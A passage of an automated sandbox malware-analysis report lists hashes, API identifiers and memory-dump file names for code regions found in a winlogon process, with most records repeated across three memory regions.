                                                                      • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                      • Instruction ID: 44ad39f614c0e5e6e16df9b5801fd44f7e32b9a3e2469b621c4dd723b53084d2
                                                                      • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                      • Instruction Fuzzy Hash: AC514B322296C4CEEB648B22D94439CBBE1FB95B96F144127DE9D47B95CF38C850C702
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CallEncodePointerTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3544855599-2084237596
                                                                      • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                      • Instruction ID: 05b550294fc46059f422ccd144b92c8f6dc198d183ea70f41fb266f34509afe2
                                                                      • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                      • Instruction Fuzzy Hash: 2E617B32629BC4C9EB608B15E4407DEB7A0FB85B99F044226EF9C13B99DF78C190CB01
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                      • Instruction ID: 73ca63169611282b1fd76395518590c23ed5720bfcd024d47443764454fedbce
                                                                      • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                      • Instruction Fuzzy Hash: D5512D322206C0CBEB648B15D54439DBBE1FBA5B98F184127DE9D47BA5CF38D461C702
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CallEncodePointerTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3544855599-2084237596
                                                                      • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                      • Instruction ID: 53fc76e044395b4f7f4c0e363ea9e36206b6e0e3be26f9c575fcb892ae53d47f
                                                                      • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                      • Instruction Fuzzy Hash: F3616D72614BC4C6DB219B15E4407DEBBA0FB99B94F044226EF9C17BA5DF78C1A4CB01
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                      • Instruction ID: 61b8ed2191b81079838a078a07b00c27b39673080e75a3640b0516ff567da48a
                                                                      • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                      • Instruction Fuzzy Hash: 6E5117332206C2CAEB648B26D94439DB7E1EB95B94F148127DE9D47B95CF38D451CB03
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CallEncodePointerTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3544855599-2084237596
                                                                      • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                      • Instruction ID: 237c7bf8059998886fd6e76e132d35b59d02ee831f4b474557ebd09e9101aac5
                                                                      • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                      • Instruction Fuzzy Hash: 31616A33618BC5C5EB608B25E4407DEB7A0FB85B98F044226EE9C13B99DF78C191CB02
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000003.2361473448.000001E858950000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_3_1e858950000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                      • Instruction ID: 79d4f442513ea6074362501cc60a5e91ef021592a8e5cf710cdd5a3edcf7ebc0
                                                                      • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                      • Instruction Fuzzy Hash: C65149322242C5CAEB648B21E54439DB7E0EF55B96F144127DE9E47B95CF38C891CB06
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastWrite
                                                                      • String ID: U$ !-M
                                                                      • API String ID: 442123175-2293091100
                                                                      • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                                      • Instruction ID: c669f7e80c849c7e795aa88b4f74ad4c10997911cc59df6ae954efb627a82d49
                                                                      • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                                      • Instruction Fuzzy Hash: 8141AD72625A80C6EB259FA5E8447DEF7A1FB88794F944132EE4D87798EF38C441CB40
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                      • String ID: pid_
                                                                      • API String ID: 517849248-4147670505
                                                                      • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                                      • Instruction ID: a4f7c1d3c8705480cf3b39b7eae3cc7439d2fd79865e05cd4d819d0bcf9f78a9
                                                                      • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                                      • Instruction Fuzzy Hash: 05112631328BC1E6EB10DB25EC143DEB7A4BF98B81F944136AE4D83695EF69C909D740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                      • String ID: pid_
                                                                      • API String ID: 517849248-4147670505
                                                                      • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                                      • Instruction ID: dd026c5fa4d2330457ae385103dc0bf4f460bc2cdbdd279a505453133e33b41c
                                                                      • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                                      • Instruction Fuzzy Hash: 79116A31330BC1E2EB209B25EC443DEBAA4BF88780F804036AE5DC3694EF68C955DB40
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                      • String ID: pid_
                                                                      • API String ID: 517849248-4147670505
                                                                      • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                                      • Instruction ID: 77fbfae80de7dc18d22d0964eaae67b14a423c715cee422fe909abb7954749d3
                                                                      • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                                      • Instruction Fuzzy Hash: 30113731324BC2E2EB109B25EC553DEB3A4BF88780F944136AE4DC3694EF69C945DB40
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: FeaturePresentProcessor__raise_securityfailurecapture_previous_context
                                                                      • String ID: !-M
                                                                      • API String ID: 838830666-3625753649
                                                                      • Opcode ID: 5d73ba4cf61c258e47cb3bab5a4b974cfb05aa9f852afdb55bf25e222216e53e
                                                                      • Instruction ID: 1bc11dc885bcc7d3ceb89c70c773aaa032a79fd5d3729657bab22ccef2b70508
                                                                      • Opcode Fuzzy Hash: 5d73ba4cf61c258e47cb3bab5a4b974cfb05aa9f852afdb55bf25e222216e53e
                                                                      • Instruction Fuzzy Hash: 8821C274265B80C2EB829B54EC913DDBAA4FB85344FA00137DE8E967A1EF3C84558711
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                      • String ID:
                                                                      • API String ID: 2718003287-0
                                                                      • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                                      • Instruction ID: 7a3af278c6e720fa22ad203ccb08c69839dc181df0b3a247f022752b061cb0db
                                                                      • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                                      • Instruction Fuzzy Hash: 3DD1AA32728A84CAE711CFA9D4403ECBBB1FB54B98F444226DE5EA7B99DE35C506C340
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                      • String ID:
                                                                      • API String ID: 2718003287-0
                                                                      • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                                      • Instruction ID: f026f3b48aa472f1155e9ab151f477d46f8fa57846d6a2d32a19188b789717b6
                                                                      • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                                      • Instruction Fuzzy Hash: 7ED1DE32724A84C9E711CFA5D4402ECB7B2FB54B98F444227DE6EA7B99DE34C156C740
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Free
                                                                      • String ID:
                                                                      • API String ID: 3168794593-0
                                                                      • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                                      • Instruction ID: 85548942e99c9506d717767bddf68c56fc7092a0cd4320be4496cac7d0c31cd3
                                                                      • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                                      • Instruction Fuzzy Hash: 7E01D332624A90DAE714EF66E80829DBBA1FB88F81B0A4036DF4D53728DE39D491C740
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Free
                                                                      • String ID:
                                                                      • API String ID: 3168794593-0
                                                                      • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                                      • Instruction ID: d5f528d63e6feb08309cdca42a1afb5b17736821da054d828a3cb29391c2735b
                                                                      • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                                      • Instruction Fuzzy Hash: 3F01D732720A90DAE719EF66E84419DBBA1FB88F81B094036EF4D57768DE34E461C740
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Free
                                                                      • String ID:
                                                                      • API String ID: 3168794593-0
                                                                      • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                                      • Instruction ID: 651c372f9e027c0f515e74e51b651074f210ef9c576e9b995b9ccc74c9d379da
                                                                      • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                                      • Instruction Fuzzy Hash: 4A01D732620A90DAE724EF66E80419EB7A2FB88F81B094036DF4D53728EE34D451C740
                                                                      APIs
                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001E8589C28DF), ref: 000001E8589C2A12
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleMode
                                                                      • String ID:
                                                                      • API String ID: 4145635619-0
                                                                      • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                                      • Instruction ID: 0011b82c73006544e61d9242a2f0458b14590937442378c818543140c3e594b1
                                                                      • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                                      • Instruction Fuzzy Hash: F191DD32720690C9FB609FA5D8503EDFFA0BB55B88F44412BDE4E67A95DE36C486C300
                                                                      APIs
                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001E8589F28DF), ref: 000001E8589F2A12
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleMode
                                                                      • String ID:
                                                                      • API String ID: 4145635619-0
                                                                      • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                                      • Instruction ID: 63b059fa379599774d0a53ac3b487b22b4f6831f2685035a2ab0bac27bba78e6
                                                                      • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                                      • Instruction Fuzzy Hash: D291CE32720690C9FB6A8FA5D8503EDFBA0BB55B98F54412BDE4E67A85DE34C486C700
                                                                      APIs
                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001E8589928DF), ref: 000001E858992A12
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleMode
                                                                      • String ID:
                                                                      • API String ID: 4145635619-0
                                                                      • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                                      • Instruction ID: 988a3d2560d2666c34e170dd821e7d56b53ff1f52112a4074da463ec6a783af7
                                                                      • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                                      • Instruction Fuzzy Hash: 3191FE32721690C9FB609FA5D8503EDFBA2FB55B98F44412BDE1E63A95DE34C486C300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
